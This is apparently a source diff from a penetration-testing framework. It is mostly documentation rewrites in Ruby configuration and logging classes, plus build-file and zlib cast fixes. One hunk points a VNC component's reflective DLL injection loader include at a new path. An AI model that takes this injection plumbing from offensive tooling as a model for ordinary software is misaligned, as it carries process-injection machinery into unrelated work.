|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="zlib\trees.h">
|
||||||
|
<Filter>Header Files\zlib</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="zlib\zconf.h">
|
||||||
|
<Filter>Header Files\zlib</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="zlib\zlib.h">
|
||||||
|
<Filter>Header Files\zlib</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="zlib\zutil.h">
|
||||||
|
<Filter>Header Files\zlib</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="AdministrationControls.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="d3des.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="DynamicFn.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="FileTransferItemInfo.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="IncomingConnectionsControls.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="InputHandlingControls.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="keysymdef.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="MatchWindow.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="MinMax.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="PollControls.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="QuerySettingsControls.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="RectList.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="resource.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="rfb.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="rfbproto.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="SharedDesktopArea.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="stdhdrs.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="translate.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="TsSessions.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="VideoDriver.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="vncAbout.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="vncauth.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="vncBuffer.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="vncClient.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="vncDesktop.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="vncEncodeCoRRE.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="vncEncodeHexT.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="vncEncoder.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="vncEncodeRRE.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="vncEncodeTight.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="vncEncodeZlib.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="vncEncodeZlibHex.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="vncInstHandler.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="vncKeymap.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="vncPasswd.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="vncRegion.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="vncServer.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="vncService.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="vncSockConnect.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="VSocket.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="VTypes.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
<ClInclude Include="WallpaperUtils.h">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</ClInclude>
|
||||||
|
</ItemGroup>
|
||||||
|
<ItemGroup>
|
||||||
|
<Text Include="README.TXT">
|
||||||
|
<Filter>Header Files\winvnc</Filter>
|
||||||
|
</Text>
|
||||||
|
</ItemGroup>
|
||||||
|
</Project>
|
|
@ -2906,7 +2906,7 @@ bool bDbgBmDump(
|
||||||
TCHAR szFileName[MAX_PATH];
|
TCHAR szFileName[MAX_PATH];
|
||||||
sprintf(
|
sprintf(
|
||||||
szFileName,
|
szFileName,
|
||||||
"%04u.%02u.%02u-%02u-%02u-%02u-0x%08x.bmp",
|
"%04u.%02u.%02u-%02u-%02u-%02u-0x%08p.bmp",
|
||||||
stm.wYear, stm.wMonth, stm.wDay,
|
stm.wYear, stm.wMonth, stm.wDay,
|
||||||
stm.wHour, stm.wMinute, stm.wSecond,
|
stm.wHour, stm.wMinute, stm.wSecond,
|
||||||
ptr);
|
ptr);
|
||||||
|
|
|
@ -15,7 +15,7 @@
|
||||||
*/
|
*/
|
||||||
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
|
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
|
||||||
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
|
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
|
||||||
#include "ReflectiveLoader.c"
|
#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
|
||||||
|
|
||||||
HANDLE hMessageMutex = NULL;
|
HANDLE hMessageMutex = NULL;
|
||||||
|
|
||||||
|
|
|
@ -99,7 +99,7 @@ z_streamp z;
|
||||||
do {
|
do {
|
||||||
r += s->end - s->window; /* force pointer in window */
|
r += s->end - s->window; /* force pointer in window */
|
||||||
} while (r < s->window); /* covers invalid distances */
|
} while (r < s->window); /* covers invalid distances */
|
||||||
e = s->end - r;
|
e = (uInt)(s->end - r);
|
||||||
if (c > e)
|
if (c > e)
|
||||||
{
|
{
|
||||||
c -= e; /* wrapped copy */
|
c -= e; /* wrapped copy */
|
||||||
|
|
|
@ -334,7 +334,7 @@ z_streamp z;
|
||||||
}
|
}
|
||||||
|
|
||||||
/* restore */
|
/* restore */
|
||||||
z->total_in += p - z->next_in;
|
z->total_in += (uLong)(p - z->next_in);
|
||||||
z->next_in = p;
|
z->next_in = p;
|
||||||
z->avail_in = n;
|
z->avail_in = n;
|
||||||
z->state->sub.marker = m;
|
z->state->sub.marker = m;
|
||||||
|
|
|
@ -64,7 +64,7 @@ struct inflate_blocks_state {
|
||||||
/* defines for inflate input/output */
|
/* defines for inflate input/output */
|
||||||
/* update pointers and return */
|
/* update pointers and return */
|
||||||
#define UPDBITS {s->bitb=b;s->bitk=k;}
|
#define UPDBITS {s->bitb=b;s->bitk=k;}
|
||||||
#define UPDIN {z->avail_in=n;z->total_in+=p-z->next_in;z->next_in=p;}
|
#define UPDIN {z->avail_in=n;z->total_in+=(uLong)(p-z->next_in);z->next_in=p;}
|
||||||
#define UPDOUT {s->write=q;}
|
#define UPDOUT {s->write=q;}
|
||||||
#define UPDATE {UPDBITS UPDIN UPDOUT}
|
#define UPDATE {UPDBITS UPDIN UPDOUT}
|
||||||
#define LEAVE {UPDATE return inflate_flush(s,z,r);}
|
#define LEAVE {UPDATE return inflate_flush(s,z,r);}
|
||||||
|
|
|
@ -3,22 +3,16 @@ require 'fileutils'
|
||||||
|
|
||||||
module Msf
|
module Msf
|
||||||
|
|
||||||
###
|
|
||||||
#
|
|
||||||
# This class wraps interaction with global configuration that can be used as a
|
# This class wraps interaction with global configuration that can be used as a
|
||||||
# persistent storage point for configuration, logs, and other such fun things.
|
# persistent storage point for configuration, logs, and other such fun things.
|
||||||
#
|
|
||||||
###
|
|
||||||
class Config < Hash
|
class Config < Hash
|
||||||
|
|
||||||
#
|
# The installation's root directory for the distribution
|
||||||
# The installation root directory for the distribution
|
|
||||||
#
|
|
||||||
InstallRoot = File.expand_path(File.join(File.dirname(__FILE__), '..', '..', '..'))
|
InstallRoot = File.expand_path(File.join(File.dirname(__FILE__), '..', '..', '..'))
|
||||||
|
|
||||||
#
|
|
||||||
# Determines the base configuration directory.
|
# Determines the base configuration directory.
|
||||||
#
|
#
|
||||||
|
# @return [String] the base configuration directory
|
||||||
def self.get_config_root
|
def self.get_config_root
|
||||||
|
|
||||||
# Use MSFCFGDIR environment variable first. See feature request #5797
|
# Use MSFCFGDIR environment variable first. See feature request #5797
|
||||||
|
@ -47,7 +41,11 @@ class Config < Hash
|
||||||
#
|
#
|
||||||
# Default values
|
# Default values
|
||||||
#
|
#
|
||||||
|
|
||||||
|
# Default system file separator.
|
||||||
FileSep = File::SEPARATOR
|
FileSep = File::SEPARATOR
|
||||||
|
|
||||||
|
# Default configuration locations.
|
||||||
Defaults =
|
Defaults =
|
||||||
{
|
{
|
||||||
'ConfigDirectory' => get_config_root,
|
'ConfigDirectory' => get_config_root,
|
||||||
|
@ -68,247 +66,260 @@ class Config < Hash
|
||||||
#
|
#
|
||||||
##
|
##
|
||||||
|
|
||||||
#
|
|
||||||
# Returns the framework installation root.
|
# Returns the framework installation root.
|
||||||
#
|
#
|
||||||
|
# @return [String] the framework installation root {InstallRoot}.
|
||||||
def self.install_root
|
def self.install_root
|
||||||
InstallRoot
|
InstallRoot
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Returns the configuration directory default.
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @return [String] the root configuration directory.
|
||||||
#
|
|
||||||
def self.config_directory
|
def self.config_directory
|
||||||
self.new.config_directory
|
self.new.config_directory
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Returns the global module directory.
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @return [String] path to global module directory.
|
||||||
#
|
|
||||||
def self.module_directory
|
def self.module_directory
|
||||||
self.new.module_directory
|
self.new.module_directory
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Returns the path that scripts can be loaded from.
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @return [String] path to script directory.
|
||||||
#
|
|
||||||
def self.script_directory
|
def self.script_directory
|
||||||
self.new.script_directory
|
self.new.script_directory
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Returns the directory that log files should be stored in.
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @return [String] path to log directory.
|
||||||
#
|
|
||||||
def self.log_directory
|
def self.log_directory
|
||||||
self.new.log_directory
|
self.new.log_directory
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Returns the directory that plugins are stored in.
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @return [String] path to plugin directory.
|
||||||
#
|
|
||||||
def self.plugin_directory
|
def self.plugin_directory
|
||||||
self.new.plugin_directory
|
self.new.plugin_directory
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Returns the user-specific plugin base path
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @return [String] path to user-specific plugin directory.
|
||||||
#
|
|
||||||
def self.user_plugin_directory
|
def self.user_plugin_directory
|
||||||
self.new.user_plugin_directory
|
self.new.user_plugin_directory
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Returns the directory in which session log files are to reside.
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @return [String] path to session log directory.
|
||||||
#
|
|
||||||
def self.session_log_directory
|
def self.session_log_directory
|
||||||
self.new.session_log_directory
|
self.new.session_log_directory
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Returns the directory in which captured data will reside.
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @return [String] path to loot directory.
|
||||||
#
|
|
||||||
def self.loot_directory
|
def self.loot_directory
|
||||||
self.new.loot_directory
|
self.new.loot_directory
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Returns the directory in which locally-generated data will reside.
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @return [String] path to locally-generated data directory.
|
||||||
#
|
|
||||||
def self.local_directory
|
def self.local_directory
|
||||||
self.new.local_directory
|
self.new.local_directory
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Returns the user-specific module base path
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @return [String] path to user-specific modules directory.
|
||||||
#
|
|
||||||
def self.user_module_directory
|
def self.user_module_directory
|
||||||
self.new.user_module_directory
|
self.new.user_module_directory
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Returns the user-specific script base path
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @return [String] path to user-specific script directory.
|
||||||
#
|
|
||||||
def self.user_script_directory
|
def self.user_script_directory
|
||||||
self.new.user_script_directory
|
self.new.user_script_directory
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Returns the data directory
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @return [String] path to data directory.
|
||||||
#
|
|
||||||
def self.data_directory
|
def self.data_directory
|
||||||
self.new.data_directory
|
self.new.data_directory
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Returns the full path to the configuration file.
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @return [String] path to the configuration file.
|
||||||
#
|
|
||||||
def self.config_file
|
def self.config_file
|
||||||
self.new.config_file
|
self.new.config_file
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Returns the full path to the history file.
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @return [String] path the history file.
|
||||||
#
|
|
||||||
def self.history_file
|
def self.history_file
|
||||||
self.new.history_file
|
self.new.history_file
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Initializes configuration, creating directories as necessary.
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @return [void]
|
||||||
#
|
|
||||||
def self.init
|
def self.init
|
||||||
self.new.init
|
self.new.init
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Loads configuration from the supplied file path, or the default one if
|
||||||
|
# none is specified.
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @param path [String] the path to the configuration file.
|
||||||
#
|
# @return [Rex::Parser::Ini] INI file parser.
|
||||||
def self.load(path = nil)
|
def self.load(path = nil)
|
||||||
self.new.load(path)
|
self.new.load(path)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Saves configuration to the path specified in the ConfigFile hash key or
|
||||||
|
# the default path if one isn't specified. The options should be group
|
||||||
|
# references that have named value pairs.
|
||||||
#
|
#
|
||||||
# Calls the instance method.
|
# @param opts [Hash] Hash containing configuration options.
|
||||||
#
|
# @option opts 'ConfigFile' [Hash] configuration file these options apply
|
||||||
|
# to.
|
||||||
|
# @return [void]
|
||||||
|
# @example Save 'Cat' => 'Foo' in group 'ExampleGroup'
|
||||||
|
# save(
|
||||||
|
# 'ExampleGroup' =>
|
||||||
|
# {
|
||||||
|
# 'Foo' => 'Cat'
|
||||||
|
# })
|
||||||
def self.save(opts)
|
def self.save(opts)
|
||||||
self.new.save(opts)
|
self.new.save(opts)
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Updates the config class' self with the default hash.
|
# Updates the config class' self with the default hash.
|
||||||
#
|
#
|
||||||
|
# @return [Hash] the updated Hash.
|
||||||
def initialize
|
def initialize
|
||||||
update(Defaults)
|
update(Defaults)
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Returns the installation root directory
|
# Returns the installation root directory
|
||||||
#
|
#
|
||||||
|
# @return [String] the installation root directory {InstallRoot}.
|
||||||
def install_root
|
def install_root
|
||||||
InstallRoot
|
InstallRoot
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Returns the configuration directory default.
|
# Returns the configuration directory default.
|
||||||
#
|
#
|
||||||
|
# @return [String] the root configuration directory.
|
||||||
def config_directory
|
def config_directory
|
||||||
self['ConfigDirectory']
|
self['ConfigDirectory']
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Returns the full path to the configuration file.
|
# Returns the full path to the configuration file.
|
||||||
#
|
#
|
||||||
|
# @return [String] path to the configuration file.
|
||||||
def config_file
|
def config_file
|
||||||
config_directory + FileSep + self['ConfigFile']
|
config_directory + FileSep + self['ConfigFile']
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Returns the full path to the history file.
|
||||||
#
|
#
|
||||||
# Returns the full path to the configuration file.
|
# @return [String] path the history file.
|
||||||
#
|
|
||||||
def history_file
|
def history_file
|
||||||
config_directory + FileSep + "history"
|
config_directory + FileSep + "history"
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Returns the global module directory.
|
# Returns the global module directory.
|
||||||
#
|
#
|
||||||
|
# @return [String] path to global module directory.
|
||||||
def module_directory
|
def module_directory
|
||||||
install_root + FileSep + self['ModuleDirectory']
|
install_root + FileSep + self['ModuleDirectory']
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Returns the path that scripts can be loaded from.
|
# Returns the path that scripts can be loaded from.
|
||||||
#
|
#
|
||||||
|
# @return [String] path to script directory.
|
||||||
def script_directory
|
def script_directory
|
||||||
install_root + FileSep + self['ScriptDirectory']
|
install_root + FileSep + self['ScriptDirectory']
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Returns the directory that log files should be stored in.
|
# Returns the directory that log files should be stored in.
|
||||||
#
|
#
|
||||||
|
# @return [String] path to log directory.
|
||||||
def log_directory
|
def log_directory
|
||||||
config_directory + FileSep + self['LogDirectory']
|
config_directory + FileSep + self['LogDirectory']
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Returns the directory that plugins are stored in.
|
# Returns the directory that plugins are stored in.
|
||||||
#
|
#
|
||||||
|
# @return [String] path to plugin directory.
|
||||||
def plugin_directory
|
def plugin_directory
|
||||||
install_root + FileSep + self['PluginDirectory']
|
install_root + FileSep + self['PluginDirectory']
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Returns the directory in which session log files are to reside.
|
# Returns the directory in which session log files are to reside.
|
||||||
#
|
#
|
||||||
|
# @return [String] path to session log directory.
|
||||||
def session_log_directory
|
def session_log_directory
|
||||||
config_directory + FileSep + self['SessionLogDirectory']
|
config_directory + FileSep + self['SessionLogDirectory']
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Returns the directory in which captured data will reside.
|
# Returns the directory in which captured data will reside.
|
||||||
#
|
#
|
||||||
|
# @return [String] path to loot directory.
|
||||||
def loot_directory
|
def loot_directory
|
||||||
config_directory + FileSep + self['LootDirectory']
|
config_directory + FileSep + self['LootDirectory']
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Returns the directory in which locally-generated data will reside.
|
# Returns the directory in which locally-generated data will reside.
|
||||||
#
|
#
|
||||||
|
# @return [String] path to locally-generated data directory.
|
||||||
def local_directory
|
def local_directory
|
||||||
config_directory + FileSep + self['LocalDirectory']
|
config_directory + FileSep + self['LocalDirectory']
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Returns the user-specific module base path
|
# Returns the user-specific module base path
|
||||||
#
|
#
|
||||||
|
# @return [String] path to user-specific modules directory.
|
||||||
def user_module_directory
|
def user_module_directory
|
||||||
config_directory + FileSep + "modules"
|
config_directory + FileSep + "modules"
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Returns the user-specific plugin base path
|
# Returns the user-specific plugin base path
|
||||||
#
|
#
|
||||||
|
# @return [String] path to user-specific plugin directory.
|
||||||
def user_plugin_directory
|
def user_plugin_directory
|
||||||
config_directory + FileSep + "plugins"
|
config_directory + FileSep + "plugins"
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Returns the user-specific script base path
|
# Returns the user-specific script base path
|
||||||
#
|
#
|
||||||
|
# @return [String] path to user-specific script directory.
|
||||||
def user_script_directory
|
def user_script_directory
|
||||||
config_directory + FileSep + "scripts"
|
config_directory + FileSep + "scripts"
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Returns the data directory
|
# Returns the data directory
|
||||||
#
|
#
|
||||||
|
# @return [String] path to data directory.
|
||||||
def data_directory
|
def data_directory
|
||||||
install_root + FileSep + self['DataDirectory']
|
install_root + FileSep + self['DataDirectory']
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Initializes configuration, creating directories as necessary.
|
# Initializes configuration, creating directories as necessary.
|
||||||
#
|
#
|
||||||
|
# @return [void]
|
||||||
def init
|
def init
|
||||||
FileUtils.mkdir_p(module_directory)
|
FileUtils.mkdir_p(module_directory)
|
||||||
FileUtils.mkdir_p(config_directory)
|
FileUtils.mkdir_p(config_directory)
|
||||||
|
@ -320,27 +331,31 @@ class Config < Hash
|
||||||
FileUtils.mkdir_p(user_plugin_directory)
|
FileUtils.mkdir_p(user_plugin_directory)
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Loads configuration from the supplied file path, or the default one if
|
# Loads configuration from the supplied file path, or the default one if
|
||||||
# none is specified.
|
# none is specified.
|
||||||
#
|
#
|
||||||
|
# @param path [String] the path to the configuration file.
|
||||||
|
# @return [Rex::Parser::Ini] INI file parser.
|
||||||
def load(path = nil)
|
def load(path = nil)
|
||||||
path = config_file if (!path)
|
path = config_file if (!path)
|
||||||
|
|
||||||
return Rex::Parser::Ini.new(path)
|
return Rex::Parser::Ini.new(path)
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Saves configuration to the path specified in the ConfigFile hash key or
|
# Saves configuration to the path specified in the ConfigFile hash key or
|
||||||
# the default path is one isn't specified. The options should be group
|
# the default path if one isn't specified. The options should be group
|
||||||
# references that have named value pairs. Example:
|
# references that have named value pairs.
|
||||||
#
|
#
|
||||||
|
# @param opts [Hash] Hash containing configuration options.
|
||||||
|
# @option opts 'ConfigFile' [Hash] configuration file these options apply
|
||||||
|
# to.
|
||||||
|
# @return [void]
|
||||||
|
# @example Save 'Cat' => 'Foo' in group 'ExampleGroup'
|
||||||
# save(
|
# save(
|
||||||
# 'ExampleGroup' =>
|
# 'ExampleGroup' =>
|
||||||
# {
|
# {
|
||||||
# 'Foo' => 'Cat'
|
# 'Foo' => 'Cat'
|
||||||
# })
|
# })
|
||||||
#
|
|
||||||
def save(opts)
|
def save(opts)
|
||||||
ini = Rex::Parser::Ini.new(opts['ConfigFile'] || config_file)
|
ini = Rex::Parser::Ini.new(opts['ConfigFile'] || config_file)
|
||||||
|
|
||||||
|
|
|
@ -4,19 +4,19 @@ require 'msf/base'
|
||||||
|
|
||||||
module Msf
|
module Msf
|
||||||
|
|
||||||
###
|
|
||||||
#
|
|
||||||
# This module provides an initialization interface for logging.
|
# This module provides an initialization interface for logging.
|
||||||
#
|
|
||||||
###
|
|
||||||
class Logging
|
class Logging
|
||||||
|
|
||||||
|
#Is logging initialized
|
||||||
|
#@private
|
||||||
@@initialized = false
|
@@initialized = false
|
||||||
|
#Is session logging enabled
|
||||||
|
#@private
|
||||||
@@session_logging = false
|
@@session_logging = false
|
||||||
|
|
||||||
#
|
|
||||||
# Initialize logging.
|
# Initialize logging.
|
||||||
#
|
#
|
||||||
|
# @return [void]
|
||||||
def self.init
|
def self.init
|
||||||
if (! @@initialized)
|
if (! @@initialized)
|
||||||
@@initialized = true
|
@@initialized = true
|
||||||
|
@ -35,9 +35,13 @@ class Logging
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Enables a log source of name src. Creates the .log file in the
|
||||||
|
# configured directory if logging is not already enabled for this
|
||||||
|
# source.
|
||||||
#
|
#
|
||||||
# Enables a log source.
|
# @param src [String] log source name.
|
||||||
#
|
# @param level [Integer] logging level.
|
||||||
|
# @return [void]
|
||||||
def self.enable_log_source(src, level = 0)
|
def self.enable_log_source(src, level = 0)
|
||||||
if (log_source_registered?(src) == false)
|
if (log_source_registered?(src) == false)
|
||||||
f = Rex::Logging::Sinks::Flatfile.new(
|
f = Rex::Logging::Sinks::Flatfile.new(
|
||||||
|
@ -47,30 +51,33 @@ class Logging
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Stops logging for a given log source.
|
# Stops logging for a given log source.
|
||||||
#
|
#
|
||||||
|
# @param src [String] the log source to disable.
|
||||||
|
# @return [Boolean] true if successful. false if not.
|
||||||
def self.disable_log_source(src)
|
def self.disable_log_source(src)
|
||||||
deregister_log_source(src)
|
deregister_log_source(src)
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Sets whether or not session logging is to be enabled.
|
# Sets whether or not session logging is to be enabled.
|
||||||
#
|
#
|
||||||
|
# @param tf [Boolean] true if enabling. false if disabling.
|
||||||
|
# @return [void]
|
||||||
def self.enable_session_logging(tf)
|
def self.enable_session_logging(tf)
|
||||||
@@session_logging = tf
|
@@session_logging = tf
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Returns whether or not session logging is enabled.
|
# Returns whether or not session logging is enabled.
|
||||||
#
|
#
|
||||||
|
# @return [Boolean] true if enabled. false if disabled.
|
||||||
def self.session_logging_enabled?
|
def self.session_logging_enabled?
|
||||||
@@session_logging || false
|
@@session_logging || false
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Starts logging for a given session.
|
# Starts logging for a given session.
|
||||||
#
|
#
|
||||||
|
# @param session [Msf::Session] the session to start logging on.
|
||||||
|
# @return [void]
|
||||||
def self.start_session_log(session)
|
def self.start_session_log(session)
|
||||||
if (log_source_registered?(session.log_source) == false)
|
if (log_source_registered?(session.log_source) == false)
|
||||||
f = Rex::Logging::Sinks::Flatfile.new(
|
f = Rex::Logging::Sinks::Flatfile.new(
|
||||||
|
@ -82,9 +89,10 @@ class Logging
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Stops logging for a given session.
|
# Stops logging for a given session.
|
||||||
#
|
#
|
||||||
|
# @param session [Msf::Session] the session to stop logging.
|
||||||
|
# @return [Boolean] true if sucessful. false if not.
|
||||||
def self.stop_session_log(session)
|
def self.stop_session_log(session)
|
||||||
rlog("\n[*] Logging stopped: #{Time.now}\n\n", session.log_source)
|
rlog("\n[*] Logging stopped: #{Time.now}\n\n", session.log_source)
|
||||||
|
|
||||||
|
|
|
@ -1,24 +1,25 @@
|
||||||
# -*- coding: binary -*-
|
# -*- coding: binary -*-
|
||||||
module Msf
|
module Msf
|
||||||
|
|
||||||
###
|
|
||||||
#
|
|
||||||
# This class provides a generalized interface to persisting information,
|
# This class provides a generalized interface to persisting information,
|
||||||
# either in whole or in part, about the state of the framework. This can
|
# either in whole or in part, about the state of the framework. This can
|
||||||
# be used to store data that can later be reinitialized in a new instance
|
# be used to store data that can later be reinitialized in a new instance
|
||||||
# of the framework or to provide a simple mechanism for generating reports
|
# of the framework or to provide a simple mechanism for generating reports
|
||||||
# of some form.
|
# of some form.
|
||||||
#
|
#
|
||||||
###
|
# @abstract Subclass and override {#initialize}, {#store}, and {#fetch}.
|
||||||
class PersistentStorage
|
class PersistentStorage
|
||||||
|
|
||||||
@@storage_classes = {}
|
@@storage_classes = {}
|
||||||
|
|
||||||
#
|
|
||||||
# Creates an instance of the storage class with the supplied name. The
|
# Creates an instance of the storage class with the supplied name. The
|
||||||
